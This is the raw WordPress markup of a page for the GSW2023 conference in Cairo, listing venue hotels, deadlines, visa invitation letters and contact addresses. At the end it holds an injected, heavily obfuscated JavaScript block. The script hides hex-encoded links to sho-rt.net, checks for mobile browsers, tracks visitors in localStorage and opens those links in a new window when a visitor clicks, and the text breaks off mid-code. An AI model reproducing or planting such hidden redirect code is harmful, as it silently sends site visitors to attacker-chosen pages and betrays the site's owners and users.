More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 